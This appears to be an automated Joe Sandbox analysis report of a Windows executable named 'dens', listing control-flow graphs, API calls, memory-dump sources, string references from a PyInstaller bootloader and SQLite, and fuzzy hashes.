                                                                                                                                                                                                                                              control_flow_graph 919 7ff62c116964-7ff62c1169d7 call 7ff62c116698 922 7ff62c1169d9-7ff62c1169e2 call 7ff62c104ee8 919->922 923 7ff62c1169f1-7ff62c1169fb call 7ff62c108520 919->923 928 7ff62c1169e5-7ff62c1169ec call 7ff62c104f08 922->928 929 7ff62c116a16-7ff62c116a7f CreateFileW 923->929 930 7ff62c1169fd-7ff62c116a14 call 7ff62c104ee8 call 7ff62c104f08 923->930 943 7ff62c116d32-7ff62c116d52 928->943 933 7ff62c116afc-7ff62c116b07 GetFileType 929->933 934 7ff62c116a81-7ff62c116a87 929->934 930->928 936 7ff62c116b09-7ff62c116b44 GetLastError call 7ff62c104e7c CloseHandle 933->936 937 7ff62c116b5a-7ff62c116b61 933->937 939 7ff62c116ac9-7ff62c116af7 GetLastError call 7ff62c104e7c 934->939 940 7ff62c116a89-7ff62c116a8d 934->940 936->928 954 7ff62c116b4a-7ff62c116b55 call 7ff62c104f08 936->954 946 7ff62c116b69-7ff62c116b6c 937->946 947 7ff62c116b63-7ff62c116b67 937->947 939->928 940->939 941 7ff62c116a8f-7ff62c116ac7 CreateFileW 940->941 941->933 941->939 951 7ff62c116b72-7ff62c116bc7 call 7ff62c108438 946->951 952 7ff62c116b6e 946->952 947->951 957 7ff62c116be6-7ff62c116c17 call 7ff62c116418 951->957 958 7ff62c116bc9-7ff62c116bd5 call 7ff62c1168a0 951->958 952->951 954->928 965 7ff62c116c19-7ff62c116c1b 957->965 966 7ff62c116c1d-7ff62c116c5f 957->966 958->957 964 7ff62c116bd7 958->964 967 7ff62c116bd9-7ff62c116be1 call 7ff62c10aac0 964->967 965->967 968 7ff62c116c81-7ff62c116c8c 966->968 969 7ff62c116c61-7ff62c116c65 966->969 967->943 970 7ff62c116d30 968->970 971 7ff62c116c92-7ff62c116c96 968->971 969->968 973 7ff62c116c67-7ff62c116c7c 969->973 970->943 971->970 974 7ff62c116c9c-7ff62c116ce1 CloseHandle CreateFileW 971->974 973->968 976 7ff62c116d16-7ff62c116d2b 974->976 977 7ff62c116ce3-7ff62c116d11 GetLastError call 7ff62c104e7c call 7ff62c108660 974->977 976->970 977->976
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: f3ffae9780d734514fcb538aa07b0dcc20ba3d22e7a81d5df1322f1f37e7ba48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1DF32B28A4686EF10CFA9D8962AC3761FB59BA8B014235DE1E977D4DF7DD051C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                              • API String ID: 3510742995-509082904
                                                                                                                                                                                                                                              • Opcode ID: 3813dd515519295f32aca46ee02c005523f9b24ddf3d1145810d555d305960f9
                                                                                                                                                                                                                                              • Instruction ID: 8544716f64ef64bd21adec6aec81f44b2c1d69c18b1279dd84e450e30b1392e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3813dd515519295f32aca46ee02c005523f9b24ddf3d1145810d555d305960f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61128D25B09A4289EB5C9F15E5B0B7967A0FF44B88F984175DE6E076DCCFBCE8418302

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1747 7ff62c115e7c-7ff62c115eb1 call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 1754 7ff62c115eb7-7ff62c115ec2 call 7ff62c115598 1747->1754 1755 7ff62c115fef-7ff62c11605d call 7ff62c10a900 call 7ff62c111578 1747->1755 1754->1755 1761 7ff62c115ec8-7ff62c115ed3 call 7ff62c1155c8 1754->1761 1767 7ff62c11606b-7ff62c11606e 1755->1767 1768 7ff62c11605f-7ff62c116066 1755->1768 1761->1755 1766 7ff62c115ed9-7ff62c115efc call 7ff62c10a948 GetTimeZoneInformation 1761->1766 1779 7ff62c115f02-7ff62c115f23 1766->1779 1780 7ff62c115fc4-7ff62c115fee call 7ff62c115580 call 7ff62c115570 call 7ff62c115578 1766->1780 1769 7ff62c116070 1767->1769 1770 7ff62c1160a5-7ff62c1160b8 call 7ff62c10d5fc 1767->1770 1772 7ff62c1160fb-7ff62c1160fe 1768->1772 1773 7ff62c116073 1769->1773 1787 7ff62c1160ba 1770->1787 1788 7ff62c1160c3-7ff62c1160de call 7ff62c111578 1770->1788 1772->1773 1776 7ff62c116104-7ff62c11610c call 7ff62c115c00 1772->1776 1777 7ff62c116078-7ff62c1160a4 call 7ff62c10a948 call 7ff62c0fc550 1773->1777 1778 7ff62c116073 call 7ff62c115e7c 1773->1778 1776->1777 1778->1777 1783 7ff62c115f2e-7ff62c115f35 1779->1783 1784 7ff62c115f25-7ff62c115f2b 1779->1784 1791 7ff62c115f37-7ff62c115f3f 1783->1791 1792 7ff62c115f49 1783->1792 1784->1783 1795 7ff62c1160bc-7ff62c1160c1 call 7ff62c10a948 1787->1795 1803 7ff62c1160e0-7ff62c1160e3 1788->1803 1804 7ff62c1160e5-7ff62c1160f7 call 7ff62c10a948 1788->1804 1791->1792 1797 7ff62c115f41-7ff62c115f47 1791->1797 1799 7ff62c115f4b-7ff62c115fbf call 7ff62c11a4d0 * 4 call 7ff62c112b5c call 7ff62c116114 * 2 1792->1799 1795->1769 1797->1799 1799->1780 1803->1795 1804->1772
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155DC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                              • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction ID: 0e42b684767fa3ed664132e555174cfc10165d9da2b06abb7b9885b629ba32e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451C532A0864286EF10DF29DC8B5B96760FFA87A4F808135EA4DC7B95DF7CE4418746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                              • API String ID: 438689982-1046679716
                                                                                                                                                                                                                                              • Opcode ID: 0ecd3076d2d6882fb6d98c0ff67cdcd04c4eb88a955b905f157665d830e12fac
                                                                                                                                                                                                                                              • Instruction ID: 294e6d676861b19fa68f1278cda6abf9b840c44fe32e822b72eaf17bce5ce0af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ecd3076d2d6882fb6d98c0ff67cdcd04c4eb88a955b905f157665d830e12fac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96F19332B0C6C286EB288F659424BBA67A4FB85B48F8D4275DA6D077D9CF7CE541C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpystrcmp
                                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                                              • API String ID: 4075415522-2920599690
                                                                                                                                                                                                                                              • Opcode ID: 72605cf81aeba0c39d3a3bbad278fd64cd5b90fc2f38520c9aff5f17e0d3d4b5
                                                                                                                                                                                                                                              • Instruction ID: 4124ad41d7d78b041bca49d2b21fbce26fecd3b578755b4b9cc6247a4b85b1db
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72605cf81aeba0c39d3a3bbad278fd64cd5b90fc2f38520c9aff5f17e0d3d4b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE426126F0978286FB688B26E560B7D27A0FF88B88F4441B5DA6D477D9DF3CE4558300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: 5c466dba17c168f6fd9a0177b639aa02d90b1af07c7b936a826a034eeb355c6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F06862A1874186FBB09B64B8997667350EB85778F040335DE6D42AD4DF7CD089CA05
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                              • Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                              • Instruction ID: 286885cb7695b26eef8716fe54313316560c66573986733519af37819fe93631
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5A1D728F0AB0685EF5C8B4AB870A7863A0BF45B44F9445B5C97D5A7E8DF2CA496C340

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 269 7ff62c0f1950-7ff62c0f198b call 7ff62c0f45c0 272 7ff62c0f1991-7ff62c0f19d1 call 7ff62c0f7f90 269->272 273 7ff62c0f1c4e-7ff62c0f1c72 call 7ff62c0fc550 269->273 278 7ff62c0f1c3b-7ff62c0f1c3e call 7ff62c10004c 272->278 279 7ff62c0f19d7-7ff62c0f19e7 call 7ff62c1006d4 272->279 283 7ff62c0f1c43-7ff62c0f1c4b 278->283 284 7ff62c0f1a08-7ff62c0f1a24 call 7ff62c10039c 279->284 285 7ff62c0f19e9-7ff62c0f1a03 call 7ff62c104f08 call 7ff62c0f2910 279->285 283->273 290 7ff62c0f1a45-7ff62c0f1a5a call 7ff62c104f28 284->290 291 7ff62c0f1a26-7ff62c0f1a40 call 7ff62c104f08 call 7ff62c0f2910 284->291 285->278 299 7ff62c0f1a5c-7ff62c0f1a76 call 7ff62c104f08 call 7ff62c0f2910 290->299 300 7ff62c0f1a7b-7ff62c0f1b05 call 7ff62c0f1c80 * 2 call 7ff62c1006d4 call 7ff62c104f44 290->300 291->278 299->278 313 7ff62c0f1b0a-7ff62c0f1b14 300->313 314 7ff62c0f1b35-7ff62c0f1b4e call 7ff62c10039c 313->314 315 7ff62c0f1b16-7ff62c0f1b30 call 7ff62c104f08 call 7ff62c0f2910 313->315 321 7ff62c0f1b50-7ff62c0f1b6a call 7ff62c104f08 call 7ff62c0f2910 314->321 322 7ff62c0f1b6f-7ff62c0f1b8b call 7ff62c100110 314->322 315->278 321->278 329 7ff62c0f1b9e-7ff62c0f1bac 322->329 330 7ff62c0f1b8d-7ff62c0f1b99 call 7ff62c0f2710 322->330 329->278 333 7ff62c0f1bb2-7ff62c0f1bb9 329->333 330->278 335 7ff62c0f1bc1-7ff62c0f1bc7 333->335 336 7ff62c0f1be0-7ff62c0f1bef 335->336 337 7ff62c0f1bc9-7ff62c0f1bd6 335->337 336->336 338 7ff62c0f1bf1-7ff62c0f1bfa 336->338 337->338 339 7ff62c0f1c0f 338->339 340 7ff62c0f1bfc-7ff62c0f1bff 338->340 342 7ff62c0f1c11-7ff62c0f1c24 339->342 340->339 341 7ff62c0f1c01-7ff62c0f1c04 340->341 341->339 343 7ff62c0f1c06-7ff62c0f1c09 341->343 344 7ff62c0f1c2d-7ff62c0f1c39 342->344 345 7ff62c0f1c26 342->345 343->339 346 7ff62c0f1c0b-7ff62c0f1c0d 343->346 344->278 344->335 345->344 346->342
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F7F90: _fread_nolock.LIBCMT ref: 00007FF62C0F803A
                                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF62C0F1A1B
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                              • Opcode ID: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                              • Instruction ID: 71f3631da99adedec12b24781d99b66ab8a29dafd1101ad8d3dea79342d45c8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1081D571A0C6868AEF20DB28DC562F923A0EF487A4F404431ED8DC7795DF7DE9858786

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                              • Instruction ID: 6c1234c1b90261470ee2a4985630d516fa58d74deb0e6636dd3dc29cebe74210
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F41D261B0C6428AEF01DB25DC421B96390FF84BA4F444432ED4D87B95DF3DE992C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1159 7ff62c0f1210-7ff62c0f126d call 7ff62c0fbd80 1162 7ff62c0f126f-7ff62c0f1296 call 7ff62c0f2710 1159->1162 1163 7ff62c0f1297-7ff62c0f12af call 7ff62c104f44 1159->1163 1168 7ff62c0f12d4-7ff62c0f12e4 call 7ff62c104f44 1163->1168 1169 7ff62c0f12b1-7ff62c0f12cf call 7ff62c104f08 call 7ff62c0f2910 1163->1169 1174 7ff62c0f1309-7ff62c0f131b 1168->1174 1175 7ff62c0f12e6-7ff62c0f1304 call 7ff62c104f08 call 7ff62c0f2910 1168->1175 1182 7ff62c0f1439-7ff62c0f146d call 7ff62c0fba60 call 7ff62c104f30 * 2 1169->1182 1178 7ff62c0f1320-7ff62c0f1345 call 7ff62c10039c 1174->1178 1175->1182 1188 7ff62c0f1431 1178->1188 1189 7ff62c0f134b-7ff62c0f1355 call 7ff62c100110 1178->1189 1188->1182 1189->1188 1195 7ff62c0f135b-7ff62c0f1367 1189->1195 1197 7ff62c0f1370-7ff62c0f1398 call 7ff62c0fa1c0 1195->1197 1200 7ff62c0f139a-7ff62c0f139d 1197->1200 1201 7ff62c0f1416-7ff62c0f142c call 7ff62c0f2710 1197->1201 1202 7ff62c0f1411 1200->1202 1203 7ff62c0f139f-7ff62c0f13a9 1200->1203 1201->1188 1202->1201 1205 7ff62c0f13d4-7ff62c0f13d7 1203->1205 1206 7ff62c0f13ab-7ff62c0f13b9 call 7ff62c100adc 1203->1206 1208 7ff62c0f13ea-7ff62c0f13ef 1205->1208 1209 7ff62c0f13d9-7ff62c0f13e7 call 7ff62c119e30 1205->1209 1210 7ff62c0f13be-7ff62c0f13c1 1206->1210 1208->1197 1212 7ff62c0f13f5-7ff62c0f13f8 1208->1212 1209->1208 1215 7ff62c0f13c3-7ff62c0f13cd call 7ff62c100110 1210->1215 1216 7ff62c0f13cf-7ff62c0f13d2 1210->1216 1213 7ff62c0f140c-7ff62c0f140f 1212->1213 1214 7ff62c0f13fa-7ff62c0f13fd 1212->1214 1213->1188 1214->1201 1218 7ff62c0f13ff-7ff62c0f1407 1214->1218 1215->1208 1215->1216 1216->1201 1218->1178
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
